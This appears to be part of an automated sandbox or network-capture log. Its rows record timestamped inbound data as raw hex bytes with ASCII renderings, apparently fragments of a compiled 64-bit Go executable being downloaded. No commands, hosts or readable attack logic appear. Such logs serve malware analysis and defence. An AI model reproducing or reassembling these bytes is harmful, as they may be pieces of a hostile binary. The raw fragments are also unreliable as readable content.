2022-11-07 22:48:53 UTC	1776	IN	Data Raw: 24 88 01 00 00 48 8b ac 24 40 01 00 00 48 81 c4 48 01 00 00 c3 48 89 14 24 48 89 5c 24 08 48 89 4c 24 10 e8 45 ec ea ff 48 8b 84 24 50 01 00 00 e9 94 fa ff ff 48 8d 79 18 e8 af df ea ff e9 21 fa ff ff 48 8b 8c 24 50 01 00 00 48 8d 79 18 e8 79 de ea ff e9 a9 f9 ff ff 48 8b 05 ad 87 2f 00 48 8b 0d ae 87 2f 00 48 89 84 24 80 01 00 00 48 89 8c 24 88 01 00 00 48 8b ac 24 40 01 00 00 48 81 c4 48 01 00 00 c3 48 8d 7b 20 66 90 e8 3b de ea ff e9 00 f9 ff ff 48 8d 7a 10 e8 2d df ea ff e9 7e f8 ff ff 48 89 94 24 80 01 00 00 48 89 9c 24 88 01 00 00 48 8b ac 24 40 01 00 00 48 81 c4 48 01 00 00 c3 48 8b 15 91 86 2f 00 48 8b 05 92 86 2f 00 e9 fe f7 ff ff 48 8d 05 2e 6c 0e 00 48 89 04 24 e8 45 1d e5 ff 48 8b 44 24 08 48 c7 40 08 26 00 00 00 48 8d 0d 42 06 13 00 48 89 08 Data Ascii: $H$@HHH$H\$HL$EH$PHy!H$PHyyH/H/H$H$H$@HHH{ f;Hz-~H$H$H$@HHH/H/H.lH$EHD$H@&HBH
2022-11-07 22:48:53 UTC	1792	IN	Data Raw: 8c 24 28 01 00 00 48 89 84 24 20 01 00 00 c6 44 24 5f 01 e9 ff fa ff ff 48 8d 78 08 48 8b 8c 24 90 00 00 00 e8 a4 9f ea ff eb b0 48 8b 84 24 40 01 00 00 48 8b 48 20 48 8b 94 24 48 01 00 00 48 89 14 24 ff d1 48 83 7c 24 08 00 66 90 0f 85 90 fa ff ff 48 8b 4c 24 60 48 85 c9 b8 00 00 00 00 e9 a4 fa ff ff 48 8b 48 10 48 8b 50 18 48 8b 58 08 48 89 1c 24 48 89 4c 24 08 48 89 54 24 10 e8 a9 eb ed ff 48 8b 44 24 18 48 8b 4c 24 60 48 85 c9 75 13 0f 57 c0 48 89 c1 48 8b 84 24 50 01 00 00 e9 2f fa ff ff 48 39 c1 7f e8 48 89 c8 eb e3 48 8b 94 24 c0 00 00 00 e9 f2 f9 ff ff e8 eb a2 ea ff 90 e8 45 6c e7 ff 48 8b ac 24 30 01 00 00 48 81 c4 38 01 00 00 c3 e8 90 81 ea ff e9 0b f9 ff ff cc cc cc cc cc cc cc cc cc cc cc 65 48 8b 0c 25 28 00 00 00 48 8b 89 00 00 00 00 48 8d Data Ascii: $(H$ D$_HxH$H$@HH H$HH$H\|$fHL$`HHHHPHXH$HL$HT$HD$HL$`HuWHH$P/H9HH$ElH$0H8eH%(HH
2022-11-07 22:48:53 UTC	1808	IN	Data Raw: 4c 8b 44 24 28 48 8b 7c 24 38 48 8b 44 24 58 48 8b 4c 24 40 48 8b 5c 24 48 e9 54 ff ff ff 48 8d 05 e8 ec 0d 00 48 89 04 24 0f 1f 40 00 e8 fb 9d e4 ff 48 8b 44 24 08 48 c7 40 08 36 00 00 00 48 8d 0d 5e c3 12 00 48 89 08 48 8d 0d fd 4f 17 00 48 8b 54 24 78 48 89 0a 83 3d de 49 32 00 00 75 09 48 89 42 08 e9 a1 fe ff ff 48 8d 7a 08 e8 5a 5e ea ff e9 93 fe ff ff 48 8d 05 8e ec 0d 00 48 89 04 24 e8 a5 9d e4 ff 48 8b 44 24 08 48 c7 40 08 1b 00 00 00 48 8d 0d 21 40 12 00 48 89 08 48 8d 0d a7 4f 17 00 48 8b 54 24 78 48 89 0a 83 3d 88 49 32 00 00 75 13 48 89 42 08 48 8b 44 24 58 48 8b 4c 24 40 e9 70 fe ff ff 48 8d 7a 08 e8 fa 5d ea ff eb e6 48 8d 05 f1 78 0c 00 48 89 04 24 48 8d 05 66 f9 16 00 48 89 44 24 08 90 e8 7b 37 e7 ff 90 e8 d5 40 ea ff e9 d0 fd ff ff cc cc Data Ascii: LD$(H\|$8HD$XHL$@H\$HTHH$@HD$H@6H^HHOHT$xH=I2uHBHzZ^HH$HD$H@H!@HHOHT$xH=I2uHBHD$XHL$@pHz]HxH$HfHD${7@
2022-11-07 22:48:53 UTC	1824	IN	Data Raw: 32 00 00 75 0d 48 89 42 08 48 89 d0 90 e9 b3 fe ff ff 48 8d 7a 08 e8 b2 1e ea ff eb ec 48 8d 05 a9 39 0c 00 48 89 04 24 48 8d 05 6e b3 16 00 48 89 44 24 08 e8 34 f8 e6 ff 90 e8 8e 01 ea ff e9 09 fe ff ff cc cc cc cc cc cc cc cc cc 65 48 8b 0c 25 28 00 00 00 48 8b 89 00 00 00 00 48 3b 61 10 0f 86 0c 02 00 00 48 83 ec 70 48 89 6c 24 68 48 8d 6c 24 68 48 8b 42 08 48 8b 88 b0 00 00 00 48 8b 80 a8 00 00 00 48 8b 54 24 78 48 83 3a 00 74 0a 48 8b 6c 24 68 48 83 c4 70 c3 48 83 7a 30 00 0f 85 ae 01 00 00 48 89 4c 24 40 48 89 44 24 58 48 8b 5a 18 48 01 cb 48 39 cb 0f 8c 37 01 00 00 80 7a 28 00 74 11 48 8b 5a 18 48 01 cb 48 39 5a 20 0f 8c c6 00 00 00 48 8b 5a 18 48 8d 34 19 48 89 74 24 50 48 8b 7a 20 4c 8b 42 10 48 39 fe 77 65 48 89 7c 24 48 4c 89 44 24 60 49 8d 14 Data Ascii: 2uHBHHzH9H$HnHD$4eH%(HH;aHpHl$hHl$hHBHHHT$xH:tHl$hHpHz0HL$@HD$XHZHH97z(tHZHH9Z HZH4Ht$PHz LBH9weH\|$HLD$`I
2022-11-07 22:48:53 UTC	1840	IN	Data Raw: 4c 8b 44 24 28 48 8b 7c 24 38 48 8b 44 24 58 48 8b 4c 24 40 48 8b 5c 24 48 e9 54 ff ff ff 48 8d 05 e8 6c 0d 00 48 89 04 24 0f 1f 40 00 e8 fb 1d e4 ff 48 8b 44 24 08 48 c7 40 08 36 00 00 00 48 8d 0d 5e 43 12 00 48 89 08 48 8d 0d fd cf 16 00 48 8b 54 24 78 48 89 0a 83 3d de c9 31 00 00 75 09 48 89 42 08 e9 a2 fe ff ff 48 8d 7a 08 e8 5a de e9 ff e9 94 fe ff ff 48 8d 05 8e 6c 0d 00 48 89 04 24 e8 a5 1d e4 ff 48 8b 44 24 08 48 c7 40 08 1b 00 00 00 48 8d 0d 21 c0 11 00 48 89 08 48 8d 0d a7 cf 16 00 48 8b 54 24 78 48 89 0a 83 3d 88 c9 31 00 00 75 13 48 89 42 08 48 8b 44 24 58 48 8b 4c 24 40 e9 71 fe ff ff 48 8d 7a 08 e8 fa dd e9 ff eb e6 48 8d 05 f1 f8 0b 00 48 89 04 24 48 8d 05 76 74 16 00 48 89 44 24 08 90 e8 7b b7 e6 ff 90 e8 d5 c0 e9 ff e9 d0 fd ff ff cc cc Data Ascii: LD$(H\|$8HD$XHL$@H\$HTHlH$@HD$H@6H^CHHHT$xH=1uHBHzZHlH$HD$H@H!HHHT$xH=1uHBHD$XHL$@qHzHH$HvtHD${
2022-11-07 22:48:53 UTC	1856	IN	Data Raw: 8d 0d b7 80 11 00 48 89 08 48 8d 0d 3d 90 16 00 48 8b 94 24 80 00 00 00 48 89 0a 83 3d 1b 8a 31 00 00 75 11 48 89 42 08 48 8b 44 24 58 48 89 d1 e9 96 fe ff ff 48 8d 7a 08 e8 8f 9e e9 ff eb e8 48 8b 8c 24 80 00 00 00 0f 1f 44 00 00 e9 13 fe ff ff 48 8d 05 74 b9 0b 00 48 89 04 24 48 8d 05 99 36 16 00 48 89 44 24 08 0f 1f 40 00 e8 fb 77 e6 ff 90 e8 55 81 e9 ff e9 90 fd ff ff cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc 65 48 8b 0c 25 28 00 00 00 48 8b 89 00 00 00 00 48 8d 44 24 d8 48 3b 41 10 0f 86 58 04 00 00 48 81 ec a8 00 00 00 48 89 ac 24 a0 00 00 00 48 8d ac 24 a0 00 00 00 48 8b 42 08 48 8b 4a 10 c7 44 24 42 74 6c 73 31 66 c7 44 24 46 33 20 48 8b 94 24 b0 00 00 00 48 83 3a 00 0f 84 1a 02 00 00 48 8d 54 24 68 48 89 14 24 48 89 44 24 08 48 89 4c 24 10 Data Ascii: HH=H$H=1uHBHD$XHHzH$DHtH$H6HD$@wUeH%(HHD$H;AXHH$H$HBHJD$Btls1fD$F3 H$H:HT$hH$HD$HL$
2022-11-07 22:48:53 UTC	1872	IN	Data Raw: 4c 8b 46 30 66 0f 1f 84 00 00 00 00 00 4c 39 46 28 0f 85 b4 02 00 00 48 8b 46 38 48 8b 4e 40 48 85 c0 74 46 48 c7 46 38 00 00 00 00 83 3d 0a 4a 31 00 00 75 28 48 c7 46 40 00 00 00 00 48 c7 44 24 70 00 00 00 00 48 89 44 24 78 48 89 8c 24 80 00 00 00 48 8b 6c 24 40 48 83 c4 48 c3 48 8d 7e 40 31 d2 e8 85 5f e9 ff eb d3 0f 1f 00 48 39 5e 08 0f 8f db 00 00 00 48 8b 46 18 48 8b 4e 20 48 8b 40 18 48 89 0c 24 48 8b 4c 24 58 48 89 4c 24 08 48 89 5c 24 10 48 8b 54 24 68 48 89 54 24 18 ff d0 48 8b 44 24 20 48 8b 4c 24 30 48 8b 54 24 28 48 8b 5c 24 50 48 89 53 38 48 8d 7b 40 83 3d 78 49 31 00 00 75 7f 48 89 4b 40 66 90 48 85 c0 0f 8c 16 02 00 00 7e 28 48 8d 50 ff 48 8b 4c 24 60 48 39 ca 0f 83 3b 02 00 00 48 8b 4c 24 58 0f b6 4c 01 ff 48 89 4b 48 48 c7 43 50 ff ff ff Data Ascii: LF0fL9F(HF8HN@HtFHF8=J1u(HF@HD$pHD$xH$Hl$@HHH~@1_H9^HFHN H@H$HL$XHL$H\$HT$hHT$HD$ HL$0HT$(H\$PHS8H{@=xI1uHK@fH~(HPHL$`H9;HL$XLHKHHCP
2022-11-07 22:48:53 UTC	1888	IN	Data Raw: cc cc cc cc cc cc cc cc cc cc cc cc cc 65 48 8b 0c 25 28 00 00 00 48 8b 89 00 00 00 00 48 83 ec 08 48 89 2c 24 48 8d 2c 24 48 8b 59 20 48 85 db 75 2a 48 8b 44 24 10 48 85 c0 74 1a 48 8b 48 08 48 8b 00 48 89 44 24 18 48 89 4c 24 20 48 8b 2c 24 48 83 c4 08 c3 e8 12 11 e3 ff 90 48 8d 7c 24 10 48 39 3b 75 cc 48 89 23 eb c7 cc cc 65 48 8b 0c 25 28 00 00 00 48 8b 89 00 00 00 00 48 3b 61 10 0f 86 86 00 00 00 48 83 ec 30 48 89 6c 24 28 48 8d 6c 24 28 48 8b 44 24 38 48 8b 4c 24 40 31 d2 48 39 ca 7d 56 0f b6 1c 10 0f 1f 00 81 fb 80 00 00 00 7d 1f 48 ff c2 8d 73 e0 83 fe 5e 76 e1 83 fb 09 74 dc c6 44 24 48 01 48 8b 6c 24 28 48 83 c4 30 c3 48 89 04 24 48 89 4c 24 08 48 89 54 24 10 e8 46 66 e8 ff 8b 5c 24 18 48 8b 54 24 20 48 8b 44 24 38 48 8b 4c 24 40 eb bc c6 44 24 Data Ascii: eH%(HHH,$H,$HY Hu*HD$HtHHHHD$HL$ H,$HH\|$H9;uH#eH%(HH;aH0Hl$(Hl$(HD$8HL$@1H9}V}Hs^vtD$HHl$(H0H$HL$HT$Ff\$HT$ HD$8HL$@D$
2022-11-07 22:48:53 UTC	1904	IN	Data Raw: 8d 48 a9 eb 8f 45 8d 48 bf 0f 1f 40 00 41 80 f9 05 77 09 45 8d 48 c9 e9 78 ff ff ff 45 31 c9 e9 70 ff ff ff 48 39 fa 76 71 44 88 04 38 48 ff c7 48 ff c6 e9 1b ff ff ff 48 c7 04 24 00 00 00 00 48 89 44 24 08 48 89 54 24 10 0f 1f 00 e8 1b 3d e7 ff 48 8b 44 24 18 48 8b 4c 24 20 48 89 44 24 70 48 89 4c 24 78 0f 57 c0 0f 11 84 24 80 00 00 00 48 8b 6c 24 50 48 83 c4 58 c3 48 89 5c 24 70 48 89 54 24 78 0f 57 c0 0f 11 84 24 80 00 00 00 48 8b 6c 24 50 48 83 c4 58 c3 48 89 f8 48 89 d1 e8 c8 e2 e8 ff 48 89 f8 48 89 d1 66 90 e8 bb e2 e8 ff 4c 89 c0 48 89 d9 e8 b0 e2 e8 ff 4c 89 c0 48 89 d9 e8 a5 e2 e8 ff 48 89 f0 48 89 d9 e8 9a e2 e8 ff 48 89 f0 48 89 d1 e8 8f e2 e8 ff 48 89 f8 48 89 d1 e8 84 e2 e8 ff 48 89 d1 90 e8 7b e2 e8 ff 90 e8 75 c1 e8 ff e9 70 fc ff ff cc cc Data Ascii: HEH@AwEHxE1pH9vqD8HHH$HD$HT$=HD$HL$ HD$pHL$xW$Hl$PHXH\$pHT$xW$Hl$PHXHHHHfLHLHHHHHHHH{up
2022-11-07 22:48:53 UTC	1920	IN	Data Raw: 00 e9 c9 fb ff ff 48 8b 44 24 70 48 8b 48 10 48 89 0c 24 e8 b5 ab e2 ff 48 8b 44 24 08 48 8d 0d 89 95 15 00 48 8b 54 24 70 48 89 8a d8 10 00 00 83 3d 06 8a 30 00 00 75 11 48 89 82 e0 10 00 00 48 8b 6c 24 78 48 83 ec 80 c3 48 8d ba e0 10 00 00 e8 77 9e e8 ff eb e8 90 48 8b 5c 24 70 80 bb d0 10 00 00 00 0f 84 bf 00 00 00 48 8b 8b a0 10 00 00 48 8b 83 a8 10 00 00 48 89 ce 48 29 c1 48 85 c9 0f 8e 7d 00 00 00 48 8b 93 98 10 00 00 4c 8b 83 88 10 00 00 48 39 d6 0f 87 33 03 00 00 48 39 c6 0f 82 22 03 00 00 48 89 b3 a8 10 00 00 48 29 c2 48 89 d6 48 f7 da 48 c1 fa 3f 48 21 d0 4c 01 c0 48 8b 93 a0 10 00 00 0f 1f 40 00 48 39 93 90 10 00 00 75 11 0f 57 c0 0f 11 83 a0 10 00 00 c6 83 b0 10 00 00 01 48 89 8b f0 10 00 00 48 89 b3 f8 10 00 00 83 3d 41 89 30 00 00 75 71 48 Data Ascii: HD$pHHH$HD$HHT$pH=0uHHl$xHHwH\$pHHHH)H}HLH93H9"HH)HHH?H!LH@H9uWHH=A0uqH
2022-11-07 22:48:53 UTC	1936	IN	Data Raw: d0 00 00 00 48 8b ac 24 90 00 00 00 48 81 c4 98 00 00 00 c3 48 8b bc 24 88 00 00 00 e8 ac 5f e8 ff eb c4 39 50 7c 75 9a 48 c7 40 78 00 00 00 00 80 b8 90 02 00 00 00 0f 84 55 01 00 00 48 c7 80 80 02 00 00 00 00 00 00 83 3d ee 49 30 00 00 0f 85 26 01 00 00 48 c7 80 88 02 00 00 00 00 00 00 48 89 04 24 e8 e4 f3 ff ff 48 8b 44 24 60 48 8b 4c 24 68 48 8b 94 24 a0 00 00 00 48 89 82 80 02 00 00 83 3d b4 49 30 00 00 0f 1f 40 00 0f 85 d6 00 00 00 48 89 8a 88 02 00 00 48 85 c0 0f 85 99 00 00 00 48 8b 44 24 78 0f 1f 44 00 00 48 85 c0 7e 23 48 89 84 24 c0 00 00 00 0f 57 c0 0f 11 84 24 c8 00 00 00 48 8b ac 24 90 00 00 00 48 81 c4 98 00 00 00 c3 48 89 14 24 48 8b 84 24 a8 00 00 00 48 89 44 24 08 48 8b 84 24 b0 00 00 00 48 89 44 24 10 48 8b 84 24 b8 00 00 00 48 89 44 24 Data Ascii: H$HH$_9P\|uH@xUH=I0&HH$HD$`HL$hH$H=I0@HHHD$xDH~#H$W$H$HH$H$HD$H$HD$H$HD$
2022-11-07 22:48:53 UTC	1952	IN	Data Raw: 58 48 8d 14 08 48 8b 84 24 f0 00 00 00 48 8b 4c 24 68 48 8b 5c 24 78 48 8b 74 24 70 48 8b bc 24 88 00 00 00 66 0f 1f 84 00 00 00 00 00 48 39 ca 0f 8d 32 02 00 00 48 89 54 24 58 48 8b b8 a0 01 00 00 48 c7 04 24 00 00 00 00 0f 57 c0 0f 11 44 24 08 0f 11 44 24 18 48 89 5c 24 10 48 89 4c 24 18 48 89 74 24 20 48 89 54 24 28 4c 8b 07 48 89 fa 41 ff d0 48 8b 44 24 30 48 89 44 24 60 48 8b 44 24 60 48 89 44 24 48 80 7c 24 4a 00 0f 85 ce 01 00 00 48 8b 44 24 60 48 89 44 24 50 0f b6 44 24 55 a8 08 0f 94 c0 66 0f 1f 44 00 00 84 c0 0f 84 b0 fe ff ff 48 8b 84 24 f0 00 00 00 48 89 04 24 e8 07 ea ff ff 48 8b 84 24 f0 00 00 00 48 89 04 24 48 8d 88 28 02 00 00 48 89 8c 24 80 00 00 00 48 89 4c 24 08 48 c7 44 24 10 80 00 00 00 48 c7 44 24 18 80 00 00 00 e8 50 d7 ff ff 48 8b Data Ascii: XHH$HL$hH\$xHt$pH$fH92HT$XHH$WD$D$H\$HL$Ht$ HT$(LHAHD$0HD$`HD$`HD$H\|$JHD$`HD$PD$UfDH$H$H$H$H(H$HL$HD$HD$PH
2022-11-07 22:48:53 UTC	1968	IN	Data Raw: c9 0f 15 00 48 89 4c 24 08 0f 10 05 c5 0f 15 00 0f 11 44 24 10 0f 10 05 c9 0f 15 00 0f 11 44 24 20 48 c7 44 24 30 00 00 00 00 48 c7 44 24 38 00 02 00 00 e8 15 a1 ff ff 48 8b 84 24 38 01 00 00 48 8b 8c 24 40 01 00 00 0f 1f 44 00 00 e9 ff fc ff ff 84 d2 75 22 48 8b 54 24 50 48 89 54 24 78 0f b6 54 24 7d 83 e2 03 88 90 81 01 00 00 b9 01 00 00 00 e9 ca fe ff ff 31 c9 e9 c3 fe ff ff 0f b6 84 24 48 01 00 00 84 c0 75 ad 48 c7 84 24 50 01 00 00 fe ff ff ff 48 8b ac 24 28 01 00 00 48 81 c4 30 01 00 00 c3 0f b6 94 24 48 01 00 00 84 d2 75 85 48 8b 94 24 80 00 00 00 48 89 54 24 70 0f b6 54 24 75 f6 c2 3f 75 0b 80 7c 24 72 00 0f 84 63 ff ff ff 48 c7 84 24 50 01 00 00 fe ff ff ff 48 8b ac 24 28 01 00 00 48 81 c4 30 01 00 00 c3 48 89 84 24 50 01 00 00 48 8b ac 24 28 01 Data Ascii: HL$D$D$ HD$0HD$8H$8H$@Du"HT$PHT$xT$}1$HuH$PH$(H0$HuH$HT$pT$u?u\|$rcH$PH$(H0H$PH$(
2022-11-07 22:48:53 UTC	1984	IN	Data Raw: 24 b8 00 00 00 48 8b bc 24 80 00 00 00 4c 8b 44 24 60 44 8b 4c 24 40 e9 5e ff ff ff 48 89 54 24 68 48 89 84 24 90 00 00 00 48 89 1c 24 48 89 4c 24 08 48 89 7c 24 10 e8 f1 e6 e6 ff 44 8b 4c 24 18 48 8b 7c 24 20 48 8b 84 24 90 00 00 00 48 8b 8c 24 88 00 00 00 48 8b 54 24 68 48 8b 9c 24 b0 00 00 00 48 8b b4 24 b8 00 00 00 4c 8b 44 24 60 e9 2b ff ff ff 48 8b 7c 24 58 31 c9 41 b9 48 00 00 00 41 ba 80 00 00 00 0f 1f 44 00 00 e9 67 02 00 00 44 8d 69 24 44 89 e1 45 89 fc 48 39 fe 0f 84 31 05 00 00 0f 86 1b 07 00 00 44 0f b6 34 3b 45 8d 7e d0 41 80 ff 09 0f 87 d6 04 00 00 41 83 c6 ea 45 0f b6 f6 41 bf 01 00 00 00 90 45 84 ff 0f 84 35 04 00 00 45 89 e7 45 0f af e6 41 01 cc 45 85 e4 0f 8c 96 03 00 00 44 89 e9 45 29 cd 41 83 fd 01 0f 8d 6c 03 00 00 41 bd 01 00 00 00 Data Ascii: $H$LD$`DL$@^HT$hH$H$HL$H\|$DL$H\|$ H$H$HT$hH$H$LD$`+H\|$X1AHADgDi$DEH91D4;E~AAEAE5EEAEDE)AlA
2022-11-07 22:48:53 UTC	2000	IN	Data Raw: 48 8b 48 08 48 8d 51 01 48 8b 18 48 8b 70 10 48 39 f2 0f 87 ce 00 00 00 48 8d 51 01 48 89 50 08 48 8d 0c 89 48 8d 14 cb 83 3d 0e 4a 2f 00 00 0f 85 82 00 00 00 48 8b 94 24 98 00 00 00 48 89 14 cb 48 8d 0c cb 48 8d 49 08 0f 10 84 24 a0 00 00 00 0f 11 01 0f 10 84 24 b0 00 00 00 0f 11 41 10 48 8b 8c 24 d8 00 00 00 48 89 4c 24 70 0f 10 84 24 e0 00 00 00 0f 11 44 24 78 0f 10 84 24 f0 00 00 00 0f 11 84 24 88 00 00 00 48 8b 4c 24 78 48 03 8c 24 88 00 00 00 48 83 c1 20 01 48 30 48 89 04 24 e8 c6 00 00 00 48 8b ac 24 c0 00 00 00 48 81 c4 c8 00 00 00 c3 48 8d 05 af 00 0d 00 48 89 04 24 48 89 54 24 08 48 8d 84 24 98 00 00 00 48 89 44 24 10 e8 74 0b e2 ff 48 8b 84 24 d0 00 00 00 e9 7a ff ff ff 48 8d 05 80 00 0d 00 48 89 04 24 48 89 5c 24 08 48 89 4c 24 10 48 89 74 24 Data Ascii: HHHQHHpH9HQHPHH=J/H$HHHI$$AH$HL$p$D$x$$HL$xH$H H0H$H$HHH$HT$H$HD$tH$zHH$H\$HL$Ht$
2022-11-07 22:48:53 UTC	2016	IN	Data Raw: 8d 0d 47 10 14 00 48 8b 94 24 80 00 00 00 48 89 4a 10 83 3d 24 0a 2f 00 00 75 0e 48 89 42 18 48 8b 44 24 58 e9 62 fe ff ff 48 8b 7c 24 68 e8 9a 1e e7 ff eb ea e8 93 1f e7 ff e9 ff fd ff ff 48 89 c2 48 89 f0 e9 41 fe ff ff 48 89 c2 e9 f9 fd ff ff 48 89 c2 48 89 f0 e9 2e fe ff ff 48 89 d1 e8 c8 23 e7 ff 90 e8 02 02 e7 ff 66 90 e9 bb fc ff ff cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc 65 48 8b 0c 25 28 00 00 00 48 8b 89 00 00 00 00 48 3b 61 10 0f 86 f3 01 00 00 48 83 ec 58 48 89 6c 24 50 48 8d 6c 24 50 48 8b 44 24 60 48 89 04 24 c6 44 24 08 0a e8 e5 c6 fd ff 48 8b 44 24 28 48 8b 4c 24 30 48 8b 54 24 18 48 8b 5c 24 10 48 8b 74 24 20 48 85 c0 0f 84 c8 00 00 00 48 89 44 24 40 48 89 4c 24 48 48 39 05 f2 c8 2b 00 74 72 48 39 Data Ascii: GH$HJ=$/uHBHD$XbH\|$hHHAHHH.H#feH%(HH;aHXHl$PHl$PHD$`H$D$HD$(HL$0HT$H\$Ht$ HHD$@HL$HH9+trH9
2022-11-07 22:48:53 UTC	2032	IN	Data Raw: 08 48 c7 41 08 2f 00 00 00 48 8d 05 80 2d 0f 00 48 89 01 48 8d 05 33 d0 13 00 eb 94 48 c7 84 24 70 01 00 00 00 00 00 00 0f 57 c0 0f 11 84 24 78 01 00 00 0f 11 84 24 88 01 00 00 48 8b 8c 24 f8 00 00 00 e9 1f ff ff ff 48 8d 05 7e 4d 0f 00 48 89 04 24 48 c7 44 24 08 3b 00 00 00 48 c7 44 24 10 00 00 00 00 0f 57 c0 0f 11 44 24 18 e8 fb 76 fd ff e9 b0 fe ff ff 48 8b 8c 24 a8 01 00 00 66 0f 1f 84 00 00 00 00 00 0f 1f 44 00 00 48 39 8c 24 d0 00 00 00 0f 85 da f9 ff ff 48 8d 05 2b bc 0d 00 48 89 04 24 e8 82 1d e1 ff 48 8b 44 24 08 48 89 84 24 d0 00 00 00 83 3d 7e c9 2e 00 00 75 40 48 8b 8c 24 a8 01 00 00 48 8b 11 48 89 10 48 8d 71 08 48 8d 78 08 48 89 6c 24 f0 48 8d 6c 24 f0 e8 f5 e7 e6 ff 48 8b 6d 00 48 8b 84 24 c0 01 00 00 48 ba 80 7f b1 d7 0d 00 00 00 e9 74 f9 Data Ascii: HA/H-HH3H$pW$x$H$H~MH$HD$;HD$WD$vH$fDH9$H+H$HD$H$=~.u@H$HHHqHxHl$Hl$HmH$Ht
2022-11-07 22:48:53 UTC	2048	IN	Data Raw: 24 00 01 00 00 48 89 84 24 38 01 00 00 48 8d 84 24 30 01 00 00 48 89 04 24 c7 44 24 08 3d 00 00 00 e8 87 44 eb ff 48 8b 84 24 60 01 00 00 48 8b 48 10 48 8b 50 18 48 89 0c 24 48 89 54 24 08 e8 49 1f 00 00 48 8b 44 24 18 48 8b 4c 24 10 90 48 8b 94 24 30 01 00 00 48 85 d2 0f 84 e4 12 00 00 48 8d 9c 24 30 01 00 00 0f 1f 44 00 00 48 39 d3 0f 85 3c 16 00 00 48 8b 94 24 40 01 00 00 48 8d 34 02 48 89 b4 24 a0 00 00 00 48 8b bc 24 48 01 00 00 4c 8b 84 24 38 01 00 00 48 39 fe 0f 87 44 12 00 00 48 89 bc 24 98 00 00 00 4c 89 84 24 00 01 00 00 4c 01 c2 48 89 14 24 48 89 4c 24 08 48 89 44 24 10 e8 a4 ab e6 ff 48 8b 84 24 a0 00 00 00 48 89 84 24 40 01 00 00 48 8b 84 24 98 00 00 00 48 89 84 24 48 01 00 00 48 8b 84 24 00 01 00 00 48 89 84 24 38 01 00 00 48 8b 84 24 60 01 Data Ascii: $H$8H$0H$D$=DH$`HHHPH$HT$IHD$HL$H$0HH$0DH9<H$@H4H$H$HL$8H9DH$L$LH$HL$HD$H$H$@H$H$HH$H$8H$`
2022-11-07 22:48:53 UTC	2064	IN	Data Raw: 18 4c 29 43 28 4c 29 c6 4d 29 c2 49 89 f3 48 f7 de 48 c1 fe 3f 4c 21 c6 48 01 fe 49 8d 3c 00 4c 8b 03 48 8b 4b 08 0f 1f 80 00 00 00 00 48 85 c9 0f 86 3c 02 00 00 4d 8b 60 08 4d 8b 28 4d 8b 40 10 4d 39 cc 0f 85 17 ff ff ff 4c 89 54 24 58 4c 89 5c 24 50 48 89 74 24 60 48 89 7c 24 30 4c 89 2c 24 4c 89 64 24 08 4c 89 44 24 10 90 e8 1b fd ff ff 48 8b 44 24 78 48 8b 48 08 48 8b 50 10 48 8b 18 48 8d 71 ff 0f 1f 80 00 00 00 00 48 39 d6 0f 87 d1 01 00 00 48 89 74 24 40 48 89 4c 24 48 48 8d 05 06 53 08 00 48 89 04 24 48 89 5c 24 08 48 89 74 24 10 48 8d 4a ff 48 f7 d9 48 c1 f9 3f 48 83 e1 18 48 01 d9 48 89 4c 24 18 48 89 74 24 20 e8 17 0d e1 ff 48 8b 44 24 78 48 8b 08 48 8b 50 08 48 8b 5c 24 40 66 0f 1f 44 00 00 48 39 d3 0f 83 66 01 00 00 48 8b 74 24 48 48 8d 34 76 Data Ascii: L)C(L)M)IHH?L!HI<LHKH<M`M(M@M9LT$XL\$PHt$`H\|$0L,$Ld$LD$HD$xHHHPHHqH9Ht$@HL$HHSH$H\$Ht$HJHH?HHHL$Ht$ HD$xHHPH\$@fDH9fHt$HH4v
2022-11-07 22:48:53 UTC	2080	IN	Data Raw: 10 0f 86 8d 00 00 00 48 83 ec 18 48 89 6c 24 10 48 8d 6c 24 10 48 8d 05 31 58 0b 00 48 89 04 24 e8 08 5e e0 ff 48 8b 44 24 08 48 8b 4c 24 28 8b 54 24 30 48 89 08 89 50 08 48 8b 4c 24 40 48 89 48 18 48 8b 4c 24 48 48 89 48 20 83 3d eb 09 2e 00 00 75 2c 48 8b 4c 24 38 48 89 48 10 48 8d 0d 69 33 13 00 48 89 4c 24 50 48 89 44 24 58 0f 57 c0 0f 11 44 24 60 48 8b 6c 24 10 48 83 c4 18 c3 48 8d 78 10 48 8b 4c 24 38 0f 1f 40 00 e8 3b 1f e6 ff eb c9 e8 d4 01 e6 ff e9 4f ff ff ff cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc 65 48 8b 0c 25 28 00 00 00 48 8b 89 00 00 00 00 48 3b 61 10 0f 86 58 01 00 00 48 83 ec 48 48 89 6c 24 40 48 8d 6c 24 40 48 8b 44 24 70 48 83 f8 04 0f 85 08 01 00 00 48 8b 44 24 68 8b 00 0f c8 0f ba f0 1f 85 c0 0f 85 98 00 00 00 8b 44 24 60 85 c0 Data Ascii: HHl$Hl$H1XH$^HD$HL$(T$0HPHL$@HHHL$HHH =.u,HL$8HHHi3HL$PHD$XWD$`Hl$HHxHL$8@;OeH%(HH;aXHHHl$@Hl$@HD$pHHD$hD$`
2022-11-07 22:48:53 UTC	2096	IN	Data Raw: 40 c3 48 8d 78 08 48 8b 44 24 60 66 90 e8 bb de e5 ff eb b0 48 8d 7a 48 31 db e8 ee df e5 ff eb 8e 48 8b 43 18 48 89 34 24 ff d0 48 8b 54 24 48 48 8b 42 50 48 03 44 24 08 48 89 42 50 48 8b 44 24 50 48 8b 4c 24 58 e9 4a ff ff ff 48 8d ba 80 00 00 00 48 8b 5c 24 68 e8 b0 df e5 ff e9 16 ff ff ff c6 44 24 17 01 48 8b 44 24 18 48 89 04 24 e8 18 7c e6 ff c6 44 24 17 00 48 8b 44 24 28 48 89 04 24 e8 a5 96 e6 ff 48 8b 6c 24 38 48 83 c4 40 c3 48 8d 05 34 f6 12 00 48 89 42 08 83 3d 99 c9 2d 00 00 75 0c 48 89 52 10 0f 1f 00 e9 84 fe ff ff 48 8d 7a 10 e8 32 df e5 ff e9 76 fe ff ff 48 89 14 24 e8 84 93 e6 ff 48 8b 4c 24 58 48 8b 54 24 48 e9 3d fe ff ff 48 8d 05 ee f8 07 00 48 89 04 24 48 8d 05 13 82 12 00 48 89 44 24 08 e8 79 b7 e2 ff 90 e8 13 ac e2 ff 48 8b 6c 24 38 Data Ascii: @HxHD$`fHzH1HCH4$HT$HHBPHD$HBPHD$PHL$XJHH\$hD$HD$H$\|D$HD$(H$Hl$8H@H4HB=-uHRHz2vH$HL$XHT$H=HH$HHD$yHl$8
